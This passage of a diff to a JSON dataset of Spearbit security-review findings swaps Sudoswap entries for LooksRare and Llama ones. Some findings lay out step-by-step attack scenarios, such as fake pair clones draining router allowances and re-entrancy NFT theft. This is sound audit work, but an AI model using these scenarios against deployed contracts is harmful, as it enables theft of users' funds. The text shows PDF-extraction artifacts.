ERC721 and ERC1155) and a desired amount, then a seller can match the buyer's request by picking a subset of items from the provided range so that the desired amount of items are eventually fulfilled. a taker might pick a single ERC1155 item id from the range and fulfill the entire order with multiple instances of that same item.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Usage of floating pragma is not recommended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": " 0.8.11 is declared in files. In foundry.toml: solc_version = '0.8.15' is used for the default build profile. In hardhat.config.ts and hardhat-coverage.config.ts: \"0.8.14\" is used. 31", + "title": "Define named constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": " ExecutionManager.sol#L289 : 0x7476320f is cast sig \"OutsideOfTimeRange()\" TransferSelectorNFT.sol#L30 : 0xa7bc96d3 is cast sig \"transferItemsERC721(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC721.selector TransferSelectorNFT.sol#L31 : 0xa0a406c6 is cast sig \"transferItemsERC1155(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC1155.selector.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Clones with malicious extradata are also considered valid clones", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Spearbit discovered that the functions verifying if a contract is a pair do so by only checking the rst 54 bytes (i.e. the Proxy code). An attacker could deploy a contract that starts with the rst 54 bytes of proxy code but have a malicious payload, and these functions will still verify it as a legitimate clone. We have found this to be a critical issue based on the feasibility of a potential exploit. Consider the following scenario: 1. An attacker creates a malicious pair by making a copy of the source of cloneETHPair() supplying malicious values for factory, bondingCurve, nft and poolType using a valid template for the connected contract. 2. The attacker has a contract with valid proxy code, connected to a valid template, but the rest of the parameters are invalid. 3. The Pair is initialized via a copy of initialize() of LSSVMPair, which calls __Ownable_init() to set a malicious owner. 4 4. The malicious owner calls call(), with target equal to the router contract and the calldata for the function pairTransferERC20From(): // Owner is set by pair creator function call(address payable target, bytes calldata data) external onlyOwner { // Factory is malicious LSSVMPairFactoryLike _factory = factory(); // `callAllowed()` is malicious and returns true require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result, ) = target.call{value: 0}(data); require(result, \"Call failed\"); ,! } 5. The check for onlyOwner and require pass, therefore pairTransferERC20From() is called with the malicious Pair as msg.sender. 6. The router checks if it is called from a valid pair via isPair(): function pairTransferERC20From(...) external { // Verify caller is a trusted pair contract // The malicious pair passed this test require(factory.isPair(msg.sender, variant), \"Not pair\"); ... token.safeTransferFrom(from, to, amount); } 7. Because the function isPair() only checks the rst 54 bytes (the runtime code including the implementation address), isPair() does not check for extra parameters factory, bondingCurve, nft or poolType: 5 function isPair(address potentialPair, PairVariant variant) ... { ... } else if (variant == PairVariant.ENUMERABLE_ETH) { return ,! LSSVMPairCloner.isETHPairClone(address(enumerableETHTemplate),potentialPair); } ... } function isETHPairClone(address implementation, address query) ... { ... // Compare expected bytecode with that of the queried contract let other := add(ptr, 0x40) extcodecopy(query, other, 0, 0x36) result := and( eq(mload(ptr), mload(other)), // Checks 32 + 22 = 54 bytes eq(mload(add(ptr, 0x16)), mload(add(other, 0x16))) ) } 8. Now the malicious pair is considered valid, the require statement in pair- TransferERC20From() has passed and tokens can be transferred to the attacker from anyone who has set an allowance for the router.", + "title": "price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the above context, a maker is bidding a maximum price pmax and a taker is asking a minimum price pmin, the strategy should calculate a price p in the range [pmin, pmax ] and so we would need to have pmin (cid:20) pmax . The above strategies pick the execution price to be pmax (the maximum price bid by the maker), and since the taker is the caller to the protocol we would only need to require pmin (cid:20) pmax . But the current requirement is pmin = pmax . if ( ... || makerBid.maxPrice != takerAsk.minPrice) { revert OrderInvalid(); }", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Critical Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Factory Owner can steal user funds approved to the Router", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "A pair owner can make arbitrary calls to any contract that has been approved by the factory owner. The code in the factory intends to prevent 6 router contracts from being approved for calls because router contracts can have access to user funds. An example includes the pairTransferERC20From() function, that can be used to steal funds from any account which has given it approval. The router contracts can nevertheless be whitelisted by rst being removed as a router and then being whitelisted. This way anyone can deploy a pair and use the call function to steal user funds.", + "title": "Change occurances of whitelist to allowlist and blacklist to blocklist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the codebase, whitelist (blacklist) is used to represent entities or objects that are allowed (denied) to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: High Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Missing check in the number of Received Tokens when tokens are transferred directly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Within the function _validateTokenInput() of LSSVMPairERC20, two methods exist to transfer tokens. In the rst method via router.pairTrans ferERC20From() a check is performed on the number of received tokens. In the second method no checks are done. Recent hacks (e.g. Qubit nance) have successfully exploited safeTransfer- From() functions which did not revert nor transfer tokens. Additionally, with malicious or re-balancing tokens the number of transferred tokens might be dif- ferent from the amount requested to be transferred. 7 function _validateTokenInput(...) ... { ... if (isRouter) { ... // Call router to transfer tokens from user uint256 beforeBalance = _token.balanceOf(_assetRecipient); router.pairTransferERC20From(...) // Verify token transfer (protect pair against malicious router) require( _token.balanceOf(_assetRecipient) - beforeBalance == ,! inputAmount, \"ERC20 not transferred in\"); } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } }", + "title": "Add more documentation on expected priceFeed decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The Chainlink strategies are making the following assumptions 1. All priceFeeds in StrategyFloorFromChainlink have a decimals value of 18. 2. The priceFeed in StrategyUSDDynamicAsk has a decimals value of 8. Any priceFeed that is added that does not match these assumptions would lead to incorrect calculations.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Malicious assetRecipient could get an unfair amount of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The function _swapNFTsForToken() of LSSVMRouter calls safe- TransferFrom(), which then calls ERC721Received of assetRecipient. A ma- licious assetRecipient could manipulate its NFT balance by buying additional NFTs via the Pair and sending or selling them back to the Pair, enabling the malicious actor to obtain an unfair amount of tokens via routerSwapNFTsForTo- ken(). 8 function _swapNFTsForToken(...) ... { ... swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // call to onERC721Received of assetRecipient } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); // checks the token balance of assetRecipient } ,! ,! }", + "title": "Code duplicates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "* In some places, Chainlink staleness is checked using block.timestamp - updatedAt > maxLa- tency, and in other places it is checked using block.timestamp > maxLatency + updatedAt. Consider refactor- ing this code into a helper function. Otherwise, it would be better to use only one version of the two code snippets across the protocol. The validation check to match assetType with the actual amount of items being transferred is duplicated among the different strategies instead of being implemented at a higher level once, such as in a common function or class that can be reused among the different strategies. _executeStrategyForTakerAsk and _executeStrategyForTakerBid almost share the same code. TakerBid, TakerAsk can be merged into a single struct. MakerBid, MakerAsk can be merged into a single struct.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Malicious Router can exploit cacheAssetRecipientNFTBalance to drain pair funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "A malicious router could be whitelisted by an inattentive or a ma- licious factory owner and drain pair funds in the following exploit scenario: 1. Call the cache function. Suppose that the current balance is 10, so it gets cached. 2. Sell 5 NFTs to the pair and get paid using swapNFTsForToken. Total bal- ance is now 15 but the cached balance is still 10. 3. Call routerSwapNFTsForToken. This function will compute total_balance 9 - cached_balance, assume 5 NFTs have been sent to it and pay the user. However, no new NFTs have been sent and it already paid for them in Step 2.", + "title": "Low level calls are not recommended as they lack type safety and won't revert for calls to EOAs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Low-level calls are not recommended for interaction between different smart contracts in modern versions of the compiler, mainly because they lack type safety, return data size checks, and won't revert for calls to Externally Owned Accounts.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Malicious Router can steal NFTs via Re-Entrancy attack", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "If the factory owner approves a malicious _router, it is possible for the malicious router to call functions like swapTokenForAnyNFTs() and set is- Router to true. Once that function reaches router.pairTransferERC20From() in _validateTokenInput(), they can re-enter the pair from the router and call swapTokenForAnyNFTs() again. This second time the function reaches router.pairTransferERC20From(), al- lowing the malicious router to execute a token transfer so that the require of _validateTokenInput is satised when the context returns to the pair. When the context returns from the reentrant call back to the original call, the require of _validateTokenInput would still pass because the balance was cached be- fore the reentrant call. Therefore, an attacker will receive 2 NFTs by sending tokens only once.", + "title": "Insufficient input validation of orders (especially on the Taker's side)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "There is a lack of consistency in the validation of parameters, as some fields of the taker's order are checked against the maker's order while others are not. It is worth noting that we have not identified any significant impact caused by this issue. Missing validation of strategyId Missing validation of collection Most strategies only validate length mismatches on one side of the order. Also, they don't usually validate that the lengths match between both sides. For example, in the DutchAuction strategy, if the makerAsk has itemIds and amounts arrays of length 2 and 2, then it would be perfectly valid for the takerBid to use itemIds and amounts arrays of length 5 and 7, as long as the first two elements of both arrays match what is expected. (FYI: I filed a related issue for the ItemIdsRange strategy, which I think is more severe of an issue because the mismatched lengths can actually be returned from the function).", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "getAllHeldIds() of LSSVMPairMissingEnumerable is vulnerable to a denial of service attack", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPairMissingEnumerable tries to compensate for NFT contracts that do not have ERC721Enumerable implemented. However, this cannot be done for everything as it is possible to use transferFrom() to send an NFT from the same collection to the Pair. In that case the callback on- ERC721Received() will not be triggered and the idSet administration of LSSVM- PairMissingEnumerable will not be updated. This means that nft().balanceO f(address(this)); can be different from the elements in idSet. Assuming an actor accidentally, or on purpose, uses transferFrom() to send additional NFTs to the Pair, getAllHeldIds() will fail as idSet.at(i) for unregistered NFTs will fail. This can be used in a grieng attack. getAllHeldIds() in LSSVMPairMissingEnumerable: function getAllHeldIds() external view override returns (uint256[] memory) { uint256 numNFTs = nft().balanceOf(address(this)); // returns the registered + unregistered NFTs uint256[] memory ids = new uint256[](numNFTs); for (uint256 i; i < numNFTs; i++) { ids[i] = idSet.at(i); // will fail at the unregistered NFTs } return ids; ,! } The following checks performed with _nft.balanceOf() might not be accurate in combination with LSSVMPairMissingEnumerable. Risk is low because any additional NFTs making later calls to _sendAnyNFTsToRecipient() and _send- SpecificNFTsToRecipient() will fail. However, this might make it more difcult to troubleshoot issues. 11 function swapTokenForAnyNFTs(...) .. { ,! ... require((numNFTs > 0) && (numNFTs <= _nft.balanceOf(address(this))),\"Ask for > 0 and <= balanceOf NFTs\"); ... _sendAnyNFTsToRecipient(_nft, nftRecipient, numNFTs); // could fail ... } function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),\"Must ask for > 0 and < balanceOf NFTs\"); // '<' should be '<=' ... _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); // could fail ... ,! ,! } Note: The error string < balanceOf NFTs is not accurate.", + "title": "LooksRareProtocol's owner can take maker's tokens for signed orders with unimplemented strat- egyIds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "If a maker signs an order that uses a strategyId that hasn't been added to the protocol yet, the protocol owner can add a malicious strategy afterward such that a taker would be able to provide no fulfillment but take all the offers.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "With NFT pools the protocol fees end up in assetRecipient instead of _factory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Assume a scenario where an NFT pool with assetRecipient set have the received funds sent directly to the assetRecipient. Now, suppose a user executes the swapTokenForSpecificNFTs(). The function _validateTokenInput() sends the required input funds, including fees to the assetRecipient. The function _payProtocolFee() tries to send the fees to the _factory. However, this function attempts to do so from the pair con- tract. The pair contract does not have any funds because they have been sent directly to the assetRecipient. So following this action the payProtocolFee() lowers the fees to 0 and sends this number to the _factory while fees end up at assetRecipient' instead of at the _factory. The fees then end up at assetRecipient instead of at the _factory. Note: The same issue occurs in swapTokenForAnyNFTs(). This issue occurs with both ETH and ERC20 NFT Pools, although their logic is slightly different. This issue occurs both when swapTokenForSpecificNFTs() is called di- rectly as well as indirectly via the LSSVMRouter. Although the pool fees are 0 with NFT pools, the factory fee is still present. Luckily, TRADE pools cannot have an assetRecipient as this would also create issues. 13 abstract contract LSSVMPair is Ownable, ReentrancyGuard { ... function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) { ,! ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); // ,! sends inputAmount to assetRecipient _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); _refundTokenToSender(inputAmount); _payProtocolFee(_factory, protocolFee); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { ... function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ,! ... uint256 pairTokenBalance = _token.balanceOf(address(this)); if (protocolFee > pairTokenBalance) { protocolFee = pairTokenBalance; } _token.safeTransfer(address(_factory), protocolFee); // tries to send from the Pair contract } ,! } abstract contract LSSVMPairETH is LSSVMPair { function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ,! ... uint256 pairETHBalance = address(this).balance; if (protocolFee > pairETHBalance) { protocolFee = pairETHBalance; } payable(address(_factory)).safeTransferETH(protocolFee); // tries to send from the Pair contract } ,! }", + "title": "Strategies with faulty price feeds can have unwanted consequences", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In LooksRare protocol once a strategy has been added its implementation and selector cannot be updated. This is a good since users who sign their MakerBid or MakerAsk can trustlessly examine the strategy implementation before including them into their orders. Some strategies might depend on other actors such as price feeds. This is the case for StrategyUSDDynamicAsk and StrategyFloorFromChainlink. If for some reason these price feeds do not return the correct prices, these strategies can have a slight deviation from their original intent. Case StrategyUSDDynamicAsk If the price feed returns a lower price, a taker can bid on an order with that lower price. This scenario is guarded by MakerAsk's minimum price. But the maker would not receive the expected amount if the correct price was reported and was greater than the maker's minimum ask. Case StrategyFloorFromChainlink For executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollec- tionOfferStrategyWithTakerAsk if the price feeds reports a floor price higher than the maker's maximum bid price, the taker can match with the maximum bid. Thus the maker ends up paying more than the actual floor adjusted by the discount formula. For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid if the price feeds report a floor price lower than the maker's minimum ask price, the taker can match with the minimum ask price and pay less than the actual floor price (adjusted by the premium).", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Error codes of Quote functions are unchecked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The error return values from functions getBuyNFTQuote() and getSellNFTQuote() are not checked in contract LSSVMRouter.sol, whereas other functions in contract LSSVMPair.sol do check for error==CurveErrorCodes.Err or.OK. abstract contract LSSVMPair is Ownable, ReentrancyGuard { ,! ,! ,! ... function getBuyNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getSellInfo(...); } function swapTokenForAnyNFTs(...) (uint256 inputAmount) { external payable virtual returns ... (error, ...) = _bondingCurve.getBuyInfo(...); require(error == CurveErrorCodes.Error.OK, \"Bonding curve error\"); ... } } LSSVMRouter.sol#L526 (, , pairOutput, ) = swapList[i].pair.getSellNFTQuote(...); The following contract lines contain the same code snippet below: LSSVMRoute r.sol#L360, LSSVMRouter.sol#L407, LSSVMRouter.sol#L450, LSSVMRouter.so l#L493, LSSVMRouter.sol#L627, LSSVMRouter.sol#L664 (, , pairCost, ) = swapList[i].pair.getBuyNFTQuote(...); Note: The current Curve contracts, which implement the getBuyNFTQuote() and getSellNFTQuote() functions, have a limited number of potential errors. However, future Curve contracts might add additional error codes.", + "title": "The provided price to IERC2981.royaltyInfo does not match the specifications", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "royaltyFeeRegistry.royaltyInfo does not return a non-zero creator address, we check whether the collection supports IERC2981 and if it does, we loop over each itemId and call the collection's royaltyInfo endpoint. But the input price parameters provided to this endpoint do not match the specification of EIP-2981: CreatorFeeManagerWithRoyalties, CreatorFeeManagerWithRebates and /// @param _salePrice - the sale price of the NFT asset specified by _tokenId 78 The price provided in viewCreatorFeeInfo functions, is the price for the whole batch of itemIds and not the individual tokens itemIds[i] provided to the royaltyInfo endpoint. Even if the return values (newCreator, newCreatorFee) would all match, it would not mean that newCreatorFee should be used as the royalty for the whole batch. An example is that if the royalty is not percentage-based, but a fixed price.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Medium Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Swaps can be front run by Pair Owner to extract any prot from slippage allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "If the user adds a nonzero slippage allowance, the pair owner can front run the swap to increase the fee/spot price and steal all of the slippage allowance. This basically makes sandwich attacks much easier and cheaper to execute for the pair owner.", + "title": "Replace the abi.encodeWithSelector with abi.encodeCall to ensure type and typo safety", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the context above, abi.encodeWithSelector is used to create the call data for a call to an external contract. This function does not guarantee that mismatched types are used for the input parameters.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Add check for numItems == 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions getBuyInfo() and getSellInfo() in LinearCurve.sol check that numItems != 0. However, the same getBuyInfo() and getSellInfo() functions in ExponentialCurve.sol do not perform this check. 17 contract LinearCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // We only calculate changes for buying 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } function getSellInfo(...) ... { // We only calculate changes for selling 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } } contract ExponentialCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // No check on `numItems` uint256 deltaPowN = delta.fpow(numItems, FixedPointMathLib.WAD); ... } function getSellInfo(... ) ... { // No check on `numItems` uint256 invDelta = ,! FixedPointMathLib.WAD.fdiv(delta,FixedPointMathLib.WAD); ... } } If the code remains unchanged, an erroneous situation may not be caught and funds might be sent when selling 0 NFTs. Luckily, when numItems == 0 then result outputValue of the functions in Expo- nentialCurve is still 0, so there is no real issue. However, it is still important to x this because a derived version of these functions might be used by future developers.", + "title": "Use the inline keccak256 with the formatting suggested when defining a named constant for an EIP-712 type hash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Hardcoded byte32 EIP-712 type hashes are defined in the OrderStructs library.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Disallow arbitrary function calls to LSSVMPairETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPairETH contains an open fallback() func- tion. The fallback() is most likely necessary because the proxy adds calldata and the receive() function, therefore not receiving the ETH. However, without additional checks any function call to an ETH Pair will succeed. This could result in unforseen scenarios which hackers could potentially exploit. fallback() external payable { emit TokenDeposited(msg.value); }", + "title": "The castApprovalBySig and castDisapprovalBySig functions can revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The castApprovalBySig and castDisapprovalBySig functions are used to cast an approve or disapprove via an off-chain signature. Within the _preCastAssertions a check is performed against the strategy using msg.sender instead of policy- holder, the strategy (e.g. AbsoluteStrategy) uses that argument to check if the cast sender is a policyholder. isApproval ? actionInfo.strategy.isApprovalEnabled(actionInfo, msg.sender) : actionInfo.strategy.isDisapprovalEnabled(actionInfo, msg.sender); While this works for normal cast, using the ones with signatures will fail as the sender can be anyone who calls the method with the signature signed off-chain.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Critical Risk" ] }, { - "title": "Only transfer relevant funds for PoolType", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The functions _initializePairETH() and _initializePairERC20() allow for the transfer of ETH/ERC20 and NFTs even when this is not relevant for the PoolType. Although funds can be rescued from the Pair, it is perhaps better to prevent these types of mistakes. 19 function _initializePairETH(...) ... { ... // Transfer initial `ETH` to `pair` // Only relevant for `PoolType.TOKEN` or `PoolType.TRADE` payable(address(_pair)).safeTransferETH(msg.value); ... // Transfer initial `NFT`s from `sender` to `pair` for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } } function _initializePairERC20(...) ... { ... // Transfer initial tokens to pair // Only relevant for PoolType.TOKEN or PoolType.TRADE _token.safeTransferFrom(msg.sender,address(_pair),_initialTokenBalance); ... // Transfer initial NFTs from sender to pair for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } }", + "title": "The castApproval/castDisapproval doesn't check if role parameter is the approvalRole", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "A policyholder should be able to cast their approval for an action if they have the approvalRole defined in the strategy. It should not be possible for other roles to cast an action. The _castApproval method verifies if the policyholder has the role passed as an argument but doesn't check if it actually has approvalRole which is eligible to cast an approval. This means any role in the llama contract can participate in the approval with completely different quantities (weights). The same problem occurs for the castDisapproval function as well.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Critical Risk" ] }, { - "title": "Check for 0 parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions setCallAllowed() and setBondingCurveAllowed() do not check that target != 0 while the comparable function setRouterAllowed() does check for _router != 0. 20 function setCallAllowed(address payable target, bool isAllowed) external ,! onlyOwner { ... // No check on target callAllowed[target] = isAllowed; } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external ,! onlyOwner { ... // No check on bondingCurve bondingCurveAllowed[bondingCurve] = isAllowed; } function setRouterAllowed(LSSVMRouter _router, bool isAllowed) external onlyOwner { require(address(_router) != address(0), \"0 router address\"); ... routerAllowed[_router] = isAllowed; ,! }", + "title": "Reducing the quantity of a policyholder results in an increase instead of a decrease in totalQuan- tity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "In Llama policyholder can approve or disapprove actions. Each policyholder has a quantity which represents their approval casting power. It is possible to update the quantity of individual policyholder with the setRoleHolder function in the LlamaPolicy. The _setRoleHolder method is not handling the decrease of quantity correctly for the totalQuantity. The totalQuantity describes the sum of the quantities of the individual policyholders for a specific role. In the case of a quantity change, the difference is calculated as follows: uint128 quantityDiff = initialQuantity > quantity ? initialQuantity - quantity : quantity - ,! initialQuantity; However, the quantityDiff is always added instead of being subtracted when the quantity is reduced. This results in an incorrect tracking of the totalQuantity. Adding the quantityDiff should only happen in the increase case. See: LlamaPolicy.sol#L388 // case: willHaveRole=true, hadRoleQuantity=true newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff;", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: High Risk" ] }, { - "title": "Potentially undetected underow In assembly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions factory(), bondingCurve(), nft(), poolType(), and token() have an assembly based calculation where the paramsLength is sub- tracted from calldatasize(). Assembly underow checks are disregarded and if too few parameters are supplied in calls to the functions in the LSSVMPair contract, this calculation may underow, resulting in the values for factory(), bondingCurve(), nft(), poolType(), and token() to be read from unexpected pieces of memory. This will be usually zeroed therefore execution will stop at some point. However, it is safer to prevent this from ever happening. 21 function factory() public pure returns (LSSVMPairFactoryLike _factory) { ... assembly {_factory := shr(0x60,calldataload(sub(calldatasize(), paramsLength)))} ,! } function bondingCurve() public pure returns (ICurve _bondingCurve) { ... assembly {_bondingCurve := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 20)))} ,! } function nft() public pure returns (IERC721 _nft) { ... assembly {_nft := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 40)))} ,! } function poolType() public pure returns (PoolType _poolType) { ... assembly {_poolType := shr(0xf8,calldataload(add(sub(calldatasize(), paramsLength), 60)))} ,! } function token() public pure returns (ERC20 _token) { ... assembly {_token := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 61)))} ,! }", + "title": "LlamaPolicy.revokePolicy cannot be called repeatedly and may result in burned tokens retaining active roles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Llama has two distinct revokePolicy functions. The first revokePolicy function removes all roles of a policyholder and burns the associated token. This function iterates over all existing roles, regardless of whether a policyholder still holds the role. In the next step the token is burned. If the total number of roles becomes too high, this transaction might not fit into one block. A second version of the revokePolicy function allows users to pass an array of roles to be removed. This approach should enable the function to be called multiple times, thus avoiding an \"out-of-gas\" error. An out-of-gas error is currently not very likely considering the maximum possible role number of 255. However, the method exists and could be called with a subset of the roles a policyholder. The method contains the following check: if (balanceOf(policyholder) == 0) revert AddressDoesNotHoldPolicy(policyholder); Therefore, it is not possible to call the method multiple times. The result of a call with a subset of roles would lead to an inconsistent state. The token of the policyholder is burned, but the policyholder could still use the remaining roles in Llama. Important methods like LlamaPolicy.hasRole don't check if LlamaPolicy.sol#L250) the token has been burned. (See", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Check number of NFTs is not 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions swapNFTsForToken(), routerSwapNFTsForToken(), and getSellNFTQuote() in LSSVMPair.sol do not perform input verication on the number of NFTs. If _bondingCurve.getSellInfo() accidentally happens to re- turn a non-zero value, then an unfair amount of tokens will be given back to the caller. The current two versions of bondingCurve do return 0, but a future version might accidentally return non-zero. Note: 1. getSellInfo() is supposed to return an error when numNFTs == 0, but this does not always happen. This error code is not always checked. function swapNFTsForToken(uint256[] calldata nftIds, ...) external virtual ,! ,! returns (uint256 outputAmount) { ... // No check on `nftIds.length` (error, newSpotPrice, outputAmount, protocolFee) = nftIds.length,..); _bondingCurve.getSellInfo(..., ... } function routerSwapNFTsForToken(address payable tokenRecipient) ... { ,! ... uint256 numNFTs = _nft.balanceOf(getAssetRecipient()) - _assetRecipientNFTBalanceAtTransferStart; ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., numNFTs, ...); ,! } function getSellNFTQuote(uint256 numNFTs) ... { ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = bondingCurve().getSellInfo(..., numNFTs,...); ... ,! } 2. For comparison, the function swapTokenForSpecificNFTs() does perform an entry check on the number of requested NFTs. 23 function swapTokenForSpecificNFTs(uint256[] calldata 